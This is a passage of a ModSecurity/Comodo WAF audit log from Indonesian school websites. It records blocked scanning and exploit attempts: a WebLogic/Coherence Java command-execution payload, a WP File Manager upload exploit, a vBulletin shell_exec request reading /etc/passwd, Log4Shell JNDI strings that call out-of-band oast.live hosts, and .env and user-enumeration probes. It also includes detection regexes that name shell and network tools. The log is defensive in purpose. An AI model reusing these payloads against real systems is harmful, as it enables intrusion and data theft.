weblogic.servlet.internal.ServletRequestImpl req = (weblogic.servlet.internal.ServletRequestImpl) obj.getClass().getMethod("getServletRequest").invoke(obj); String cmd = req.getHeader("cmd"); String[] cmds = System.getProperty("os.name").toLowerCase().contains("window") ? new String[]{"cmd.exe", "/c", cmd} : new String[]{"/bin/sh", "-c", cmd}; if (cmd != null) { String result = new java.util.Scanner(java.lang.Runtime.getRuntime().exec(cmds).getInputStream()).useDelimiter("\\A").next(); weblogic.servlet.internal.ServletResponseImpl res = (weblogic.servlet.internal.ServletResponseImpl) req.getClass().getMethod("getResponse").invoke(req); res.getServletOutputStream().writeStream(new weblogic.xml.util.StringInputStream(result)); res.getServletOutputStream().flush(); res.getWriter().write(""); }executeThread.interrupt(); "); --9780e451-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --9780e451-E-- --9780e451-H-- Message: Access denied with code 403 (phase 2). Pattern match "\\b(?:cmd(?:\\b[^a-zA-Z0-9_]{0,}?\\/c|(?:32){0,1}\\.exe\\b)|(?:ftp|n(?:c|et|map)|rcmd|telnet|w(?:guest|sh))\\.exe\\b)" at MATCHED_VAR. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "60"] [id "211200"] [rev "3"] [msg "COMODO WAF: System Command Access||perpustakaan.smkn22jakarta.sch.id|F|2"] [data "Matched Data: cmd.exe found within ARGS:handle: com.tangosol.coherence.mvel2.sh.shellsession(weblogic.work.executethread executethread =(weblogic.work.executethread) thread.currentthread() weblogic.work.workadapter adapter = executethread.getcurrentwork() java.lang.reflect.field field = adapter.getclass().getdeclaredfield(connectionhandler) field.setaccessible(true) object obj = field.get(adapter) weblogic.servlet.internal.servletrequestimpl req =(weblogic.servlet.internal.servletrequestimpl) obj.getclas..."] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748468725233779 3000 (- - -) Stopwatch2: 1748468725233779 3000; combined=945, p1=551, p2=361, p3=0, p4=0, p5=33, sr=81, sw=0, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --9780e451-Z-- --fc84ab76-A-- [29/May/2025:04:45:25 +0700] aDeD9WMaQtTb69S13pjxvQAAAFQ 103.236.140.4 57626 103.236.140.4 8181 --fc84ab76-B-- POST /wp-content/plugins/wp-file-manager/lib/php/connector.minimal.php HTTP/1.0 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https Content-Length: 608 User-Agent: Mozilla/5.0 (Fedora; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Accept: */* Content-Type: multipart/form-data; boundary=------------------------ca81ac1fececda48 X-Forwarded-For: 206.82.6.62 Cookie: X-Varnish: 160591984 --fc84ab76-C-- --------------------------ca81ac1fececda48 Content-Disposition: form-data; name="reqid" 17457a1fe6959 --------------------------ca81ac1fececda48 Content-Disposition: form-data; name="cmd" upload --------------------------ca81ac1fececda48 Content-Disposition: form-data; name="target" l1_Lw --------------------------ca81ac1fececda48 Content-Disposition: form-data; name="mtime[]" 1576045135 --------------------------ca81ac1fececda48 Content-Disposition: form-data; name="upload[]"; filename="poc.txt" Content-Type: text/plain poc-test --------------------------ca81ac1fececda48-- --fc84ab76-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --fc84ab76-E-- --fc84ab76-H-- Message: Access denied with code 403 (phase 2). Pattern match "\\/lib\\/php\\/connector\\.minimal\\.php$" at REQUEST_FILENAME. [file "/usr/local/apache/modsecurity-cwaf/rules/27_Apps_WPPlugin.conf"] [line "6778"] [id "234930"] [rev "2"] [msg "COMODO WAF: File upload vulnerability in the file manager plugin before 6.9 for WordPress (CVE-2020-25213)||perpustakaan.smkn22jakarta.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WPPlugin"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748468725761588 4017 (- - -) Stopwatch2: 1748468725761588 4017; combined=2866, p1=357, p2=2481, p3=0, p4=0, p5=28, sr=66, sw=0, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --fc84ab76-Z-- --da57fc72-A-- [29/May/2025:04:45:26 +0700] aDeD9n1Ye2lUDKzW1LvFHwAAAAM 103.236.140.4 57630 103.236.140.4 8181 --da57fc72-B-- POST /ajax/render/widget_tabbedcontainer_tab_panel HTTP/1.0 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https Content-Length: 140 User-Agent: Mozilla/5.0 (X11; Linux i686; rv:133.0) Gecko/20100101 Firefox/133.0 Content-Type: application/x-www-form-urlencoded X-Forwarded-For: 206.82.6.62 Cookie: X-Varnish: 83002161 --da57fc72-C-- subWidgets[0][template]=widget_php&subWidgets[0][config][code]=echo shell_exec('cat ../../../../../../../../../../../../etc/passwd'); exit;" --da57fc72-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --da57fc72-E-- --da57fc72-H-- Message: Access denied with code 403 (phase 2). Match of "contains cpanel" against "REQUEST_URI" required. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "55"] [id "211190"] [rev "9"] [msg "COMODO WAF: Remote File Access Attempt||perpustakaan.smkn22jakarta.sch.id|F|2"] [data "Matched Data: /etc/ found within REQUEST_URI: /ajax/render/widget_tabbedcontainer_tab_panel"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748468726803201 2157 (- - -) Stopwatch2: 1748468726803201 2157; combined=641, p1=439, p2=172, p3=0, p4=0, p5=30, sr=74, sw=0, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --da57fc72-Z-- --9f2d1d51-A-- [29/May/2025:04:45:27 +0700] aDeD931Ye2lUDKzW1LvFIAAAAAA 103.236.140.4 57642 103.236.140.4 8181 --9f2d1d51-B-- POST /mifs/.;/services/LogService HTTP/1.0 Referer: https://perpustakaan.smkn22jakarta.sch.id Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https Content-Length: 6 User-Agent: Mozilla/5.0 (Ubuntu; Linux x86_64; rv:135.0) Gecko/20100101 Firefox/135.0 Content-Type: x-application/hessian X-Forwarded-For: 206.82.6.62 Cookie: X-Varnish: 160591990 --9f2d1d51-C-- cH --9f2d1d51-F-- HTTP/1.1 404 Not Found X-Frame-Options: SAMEORIGIN Content-Length: 196 Connection: close Content-Type: text/html; charset=iso-8859-1 --9f2d1d51-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||perpustakaan.smkn22jakarta.sch.id|F|2"] [data "TX:0=x-application/hessian"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Stopwatch: 1748468727274282 3218 (- - -) Stopwatch2: 1748468727274282 3218; combined=2067, p1=483, p2=1511, p3=22, p4=23, p5=27, sr=71, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --9f2d1d51-Z-- --adb05521-A-- [29/May/2025:04:48:57 +0700] aDeEycX5pbyFXv2T3ipYOwAAAM8 103.236.140.4 57782 103.236.140.4 8181 --adb05521-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 103.132.148.254 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 103.132.148.254 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --adb05521-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --adb05521-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748468937819242 2886 (- - -) Stopwatch2: 1748468937819242 2886; combined=1274, p1=437, p2=806, p3=0, p4=0, p5=30, sr=79, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --adb05521-Z-- --8b1c2866-A-- [29/May/2025:05:06:45 +0700] aDeI9f4vV4CoZ0MKLMPd-wAAAJY 103.236.140.4 58828 103.236.140.4 8181 --8b1c2866-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 43.231.115.89 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 43.231.115.89 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --8b1c2866-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --8b1c2866-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748470005635307 2898 (- - -) Stopwatch2: 1748470005635307 2898; combined=1311, p1=430, p2=849, p3=0, p4=0, p5=31, sr=73, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --8b1c2866-Z-- --388f9f7c-A-- [29/May/2025:05:43:13 +0700] aDeRgf4vV4CoZ0MKLMPeigAAAIY 103.236.140.4 60678 103.236.140.4 8181 --388f9f7c-B-- POST /wsman HTTP/1.0 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: http Content-Length: 1709 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:120.0) Gecko/20100101 Firefox/120.0 Content-Type: application/soap+xml;charset=UTF-8 X-Forwarded-For: 206.82.6.62 Cookie: X-Varnish: 148366050 --388f9f7c-C-- HTTP://perpustakaan.smkn22jakarta.sch.id/wsman/ http://schemas.dmtf.org/wbem/wscim/1/cim-schema/2/SCX_OperatingSystem http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous http://schemas.dmtf.org/wbem/wscim/1/cim-schema/2/SCX_OperatingSystem/ExecuteScript 102400 uuid:00B60932-CC01-0005-0000-000000010000 PT1M30S root/scx aWQ= 0 true --388f9f7c-F-- HTTP/1.1 404 Not Found X-Frame-Options: SAMEORIGIN Content-Length: 196 Connection: close Content-Type: text/html; charset=iso-8859-1 --388f9f7c-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||perpustakaan.smkn22jakarta.sch.id|F|2"] [data "TX:0=application/soap+xml"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Stopwatch: 1748472193894314 3803 (- - -) Stopwatch2: 1748472193894314 3803; combined=2532, p1=593, p2=1877, p3=18, p4=20, p5=24, sr=86, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --388f9f7c-Z-- --e7019720-A-- [29/May/2025:05:43:19 +0700] aDeRh8X5pbyFXv2T3ipZgwAAAM8 103.236.140.4 60696 103.236.140.4 8181 --e7019720-B-- GET /?x=${jndi:ldap://${:-712}${:-896}.${hostName}.uri.d0rjil9gpeoh536h8tf0p9o4xqqn6ec38.oast.live/a} HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: http User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0 Cookie: X-Forwarded-For: 206.82.6.62 Accept-Encoding: gzip X-Varnish: 143614072 --e7019720-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --e7019720-H-- Message: Access denied with code 403 (phase 2). Pattern match "\\$\\{jndi:(ldaps?|rmi|dns|iiop|nis|nds|corba|\\$\\{(?:lower|upper)):" at ARGS:x. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "7626"] [id "248270"] [rev "1"] [msg "COMODO WAF: Remote code execution in Apache log4j||perpustakaan.smkn22jakarta.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748472199442744 4571 (- - -) Stopwatch2: 1748472199442744 4571; combined=3135, p1=407, p2=2698, p3=0, p4=0, p5=30, sr=72, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --e7019720-Z-- --797dba0a-A-- [29/May/2025:05:43:23 +0700] aDeRi8X5pbyFXv2T3ipZhAAAAMA 103.236.140.4 60696 103.236.140.4 8181 --797dba0a-B-- GET / HTTP/1.1 Referer: ${jndi:ldap://${:-712}${:-896}.${hostName}.referer.d0rjil9gpeoh536h8tf0cii5w63ci3o4c.oast.live} Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: http User-Agent: ${jndi:ldap://${:-712}${:-896}.${hostName}.useragent.d0rjil9gpeoh536h8tf0m9wwfc3xe78ra.oast.live} Accept: application/xml, application/json, text/plain, text/html, */${jndi:ldap://${:-712}${:-896}.${hostName}.accept.d0rjil9gpeoh536h8tf0zzdn6jcwdfwar.oast.live} Accept-Language: ${jndi:ldap://${:-712}${:-896}.${hostName}.acceptlanguage.d0rjil9gpeoh536h8tf0a7eymjd76nfpm.oast.live} Access-Control-Request-Headers: ${jndi:ldap://${:-712}${:-896}.${hostName}.accesscontrolrequestheaders.d0rjil9gpeoh536h8tf09wkx3ck6tkq6q.oast.live} Access-Control-Request-Method: ${jndi:ldap://${:-712}${:-896}.${hostName}.accesscontrolrequestmethod.d0rjil9gpeoh536h8tf06mbtocisy9g1q.oast.live} Authentication: Bearer ${jndi:ldap://${:-712}${:-896}.${hostName}.authenticationbearer.d0rjil9gpeoh536h8tf0bzauoyhi64xjo.oast.live} Location: ${jndi:ldap://${:-712}${:-896}.${hostName}.location.d0rjil9gpeoh536h8tf0pow1t86e3ueby.oast.live} Origin: ${jndi:ldap://${:-712}${:-896}.${hostName}.origin.d0rjil9gpeoh536h8tf0mahk75nomgoj1.oast.live} Upgrade-Insecure-Requests: ${jndi:ldap://${:-712}${:-896}.${hostName}.upgradeinsecurerequests.d0rjil9gpeoh536h8tf0mxptq7npjh86w.oast.live} X-Api-Version: ${jndi:ldap://${:-712}${:-896}.${hostName}.xapiversion.d0rjil9gpeoh536h8tf0nyeun9gcen1ct.oast.live} X-CSRF-Token: ${jndi:ldap://${:-712}${:-896}.${hostName}.xcsrftoken.d0rjil9gpeoh536h8tf0h1dj4h9pgjsh7.oast.live} X-Druid-Comment: ${jndi:ldap://${:-712}${:-896}.${hostName}.xdruidcomment.d0rjil9gpeoh536h8tf07jm4c6z6txm9r.oast.live} X-Origin: ${jndi:ldap://${:-712}${:-896}.${hostName}.xorigin.d0rjil9gpeoh536h8tf0pcjh3jdyiguic.oast.live} Cookie: ${jndi:ldap://${:-712}${:-896}.${hostName}.cookiename.d0rjil9gpeoh536h8tf0sbg9xjwky573o.oast.live}=${jndi:ldap://${:-712}${:-896}.${hostName}.cookievalue.d0rjil9gpeoh536h8tf04crxztuumtc7t.oast.live} X-Forwarded-For: 206.82.6.62 Accept-Encoding: gzip X-Varnish: 143614078 --797dba0a-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --797dba0a-H-- Message: Access denied with code 403 (phase 2). Pattern match "\\$\\{jndi:(ldaps?|rmi|dns|iiop|nis|nds|corba|\\$\\{(?:lower|upper)):" at REQUEST_HEADERS:Referer. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "7626"] [id "248270"] [rev "1"] [msg "COMODO WAF: Remote code execution in Apache log4j||perpustakaan.smkn22jakarta.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748472203414733 3654 (- - -) Stopwatch2: 1748472203414733 3654; combined=2527, p1=339, p2=2159, p3=0, p4=0, p5=29, sr=66, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --797dba0a-Z-- --c3100504-A-- [29/May/2025:05:48:28 +0700] aDeSvMX5pbyFXv2T3ipZkQAAAM8 103.236.140.4 32782 103.236.140.4 8181 --c3100504-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 186.179.100.204 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 186.179.100.204 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --c3100504-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --c3100504-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748472508914657 2633 (- - -) Stopwatch2: 1748472508914657 2633; combined=1257, p1=407, p2=821, p3=0, p4=0, p5=29, sr=73, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --c3100504-Z-- --61ab3651-A-- [29/May/2025:05:57:07 +0700] aDeUw31Ye2lUDKzW1LvF2AAAABM 103.236.140.4 33154 103.236.140.4 8181 --61ab3651-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 37.208.42.94 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 37.208.42.94 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --61ab3651-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --61ab3651-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748473027184344 2807 (- - -) Stopwatch2: 1748473027184344 2807; combined=1235, p1=418, p2=787, p3=0, p4=0, p5=30, sr=74, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --61ab3651-Z-- --99f5a409-A-- [29/May/2025:06:00:26 +0700] aDeVin1Ye2lUDKzW1LvF-AAAABI 103.236.140.4 33248 103.236.140.4 8181 --99f5a409-B-- GET /.env HTTP/1.0 Host: mignere.twilightparadox.com X-Real-IP: 146.190.103.103 X-Forwarded-Host: mignere.twilightparadox.com X-Forwarded-Server: mignere.twilightparadox.com X-Forwarded-For: 146.190.103.103 X-Forwarded-Proto: https Connection: close User-Agent: Go-http-client/1.1 --99f5a409-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --99f5a409-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1748473226398756 762 (- - -) Stopwatch2: 1748473226398756 762; combined=309, p1=262, p2=0, p3=0, p4=0, p5=47, sr=72, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --99f5a409-Z-- --9fbcf171-A-- [29/May/2025:06:27:40 +0700] aDeb7P4vV4CoZ0MKLMPfCQAAAI0 103.236.140.4 34530 103.236.140.4 8181 --9fbcf171-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 170.82.182.159 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 170.82.182.159 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --9fbcf171-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --9fbcf171-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748474860533066 3097 (- - -) Stopwatch2: 1748474860533066 3097; combined=1486, p1=505, p2=947, p3=0, p4=0, p5=33, sr=76, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --9fbcf171-Z-- --c6463e55-A-- [29/May/2025:06:29:19 +0700] aDecT31Ye2lUDKzW1LvGVAAAAAw 103.236.140.4 34568 103.236.140.4 8181 --c6463e55-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 203.176.128.138 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 203.176.128.138 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --c6463e55-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --c6463e55-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748474959639321 3275 (- - -) Stopwatch2: 1748474959639321 3275; combined=1417, p1=484, p2=900, p3=0, p4=0, p5=33, sr=80, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --c6463e55-Z-- --74ed5e0a-A-- [29/May/2025:06:40:42 +0700] aDee-sX5pbyFXv2T3ipavgAAAM4 103.236.140.4 35918 103.236.140.4 8181 --74ed5e0a-B-- POST /wsman HTTP/1.0 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https Content-Length: 1709 User-Agent: Mozilla/5.0 (SS; Linux i686; rv:121.0) Gecko/20100101 Firefox/121.0 